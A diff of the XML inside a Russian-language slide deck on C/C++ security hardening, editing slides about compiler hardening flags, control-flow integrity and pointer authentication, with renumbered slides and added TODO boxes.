+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection=full</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защиты в критическом ПО</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>LLVM #122687</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Конкретный набор зависит от версии компилятора</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно посмотреть функцию </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>print_help_hardened</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сейчас</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrivial</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-auto-var-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=zero -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fPIE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -Wl,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -Wl,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection=full</a:t>
-            </a:r>
+              <a:t>Чаты, почтовые клиенты, мультимедиа, интерпретаторы, БД, офисное ПО</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ридеры</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -29021,6 +29021,45 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2794B4-69E7-4919-8A1F-B6D7F7392F01}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6660777" y="347354"/>
+            <a:ext cx="2187388" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>TODO: Android</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -10932,7 +10932,15 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc (</a:t>
+              <a:t>Glibc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Bionic (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId97"/>
+    <p:notesMasterId r:id="rId98"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
@@ -78,31 +78,32 @@
     <p:sldId id="335" r:id="rId69"/>
     <p:sldId id="336" r:id="rId70"/>
     <p:sldId id="337" r:id="rId71"/>
-    <p:sldId id="353" r:id="rId72"/>
-    <p:sldId id="354" r:id="rId73"/>
-    <p:sldId id="349" r:id="rId74"/>
-    <p:sldId id="350" r:id="rId75"/>
-    <p:sldId id="352" r:id="rId76"/>
-    <p:sldId id="343" r:id="rId77"/>
-    <p:sldId id="344" r:id="rId78"/>
-    <p:sldId id="331" r:id="rId79"/>
-    <p:sldId id="330" r:id="rId80"/>
-    <p:sldId id="345" r:id="rId81"/>
-    <p:sldId id="346" r:id="rId82"/>
-    <p:sldId id="270" r:id="rId83"/>
-    <p:sldId id="347" r:id="rId84"/>
-    <p:sldId id="271" r:id="rId85"/>
-    <p:sldId id="274" r:id="rId86"/>
-    <p:sldId id="286" r:id="rId87"/>
-    <p:sldId id="278" r:id="rId88"/>
-    <p:sldId id="292" r:id="rId89"/>
-    <p:sldId id="298" r:id="rId90"/>
-    <p:sldId id="304" r:id="rId91"/>
-    <p:sldId id="310" r:id="rId92"/>
-    <p:sldId id="317" r:id="rId93"/>
-    <p:sldId id="322" r:id="rId94"/>
-    <p:sldId id="339" r:id="rId95"/>
-    <p:sldId id="338" r:id="rId96"/>
+    <p:sldId id="355" r:id="rId72"/>
+    <p:sldId id="353" r:id="rId73"/>
+    <p:sldId id="354" r:id="rId74"/>
+    <p:sldId id="349" r:id="rId75"/>
+    <p:sldId id="350" r:id="rId76"/>
+    <p:sldId id="352" r:id="rId77"/>
+    <p:sldId id="343" r:id="rId78"/>
+    <p:sldId id="344" r:id="rId79"/>
+    <p:sldId id="331" r:id="rId80"/>
+    <p:sldId id="330" r:id="rId81"/>
+    <p:sldId id="345" r:id="rId82"/>
+    <p:sldId id="346" r:id="rId83"/>
+    <p:sldId id="270" r:id="rId84"/>
+    <p:sldId id="347" r:id="rId85"/>
+    <p:sldId id="271" r:id="rId86"/>
+    <p:sldId id="274" r:id="rId87"/>
+    <p:sldId id="286" r:id="rId88"/>
+    <p:sldId id="278" r:id="rId89"/>
+    <p:sldId id="292" r:id="rId90"/>
+    <p:sldId id="298" r:id="rId91"/>
+    <p:sldId id="304" r:id="rId92"/>
+    <p:sldId id="310" r:id="rId93"/>
+    <p:sldId id="317" r:id="rId94"/>
+    <p:sldId id="322" r:id="rId95"/>
+    <p:sldId id="339" r:id="rId96"/>
+    <p:sldId id="338" r:id="rId97"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -291,7 +292,7 @@
           <a:p>
             <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -705,7 +706,7 @@
           <a:p>
             <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -903,7 +904,7 @@
           <a:p>
             <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1111,7 +1112,7 @@
           <a:p>
             <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1309,7 +1310,7 @@
           <a:p>
             <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1584,7 +1585,7 @@
           <a:p>
             <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1849,7 +1850,7 @@
           <a:p>
             <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2261,7 +2262,7 @@
           <a:p>
             <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2402,7 +2403,7 @@
           <a:p>
             <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2515,7 +2516,7 @@
           <a:p>
             <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2826,7 +2827,7 @@
           <a:p>
             <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3114,7 +3115,7 @@
           <a:p>
             <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3355,7 +3356,7 @@
           <a:p>
             <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/20/2025</a:t>
+              <a:t>7/21/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -16634,6 +16635,58 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA578E3-B533-47EF-BC65-1016CC794567}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6096000" y="365125"/>
+            <a:ext cx="2653553" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>понятный пример</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -17140,6 +17193,58 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4BA34AF-5A12-4F60-9A30-58CAB514BFDC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6096000" y="365125"/>
+            <a:ext cx="2653553" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>понятный пример</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -18019,62 +18124,62 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>      // -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>ftrivial</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>-auto-var-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>init</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
+            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>      // </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" sz="1400" dirty="0">
+              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>вставит здесь </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>memset</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
+              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
@@ -23055,6 +23160,25 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Реализована только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддержана в GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Проверяет совпадения статического и динамического прототипа при вызове функции по указателю</a:t>
             </a:r>
           </a:p>
@@ -23077,7 +23201,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>лгоритмы проверки для них сильно различаются)</a:t>
+              <a:t>лгоритмы проверки сильно различаются)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -23086,25 +23210,6 @@
               <a:t>Также может использоваться для доп. проверок (корректность C++ кастов и пр.)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Реализована только в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддержана в GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -23226,7 +23331,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -23259,16 +23364,12 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel IBT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 BTI:</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки адресов возврата</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -23293,14 +23394,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 PAC:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Pointer Authentication</a:t>
+              <a:t>Pointer Authentication (AArch64)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -23692,7 +23786,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостатки</a:t>
+              <a:t>Накладные расходы</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -23717,7 +23811,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -23821,131 +23915,6 @@
               <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Фрагментация: три несвязанных решения с разными, GCC не поддерживает LLVM CFI</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
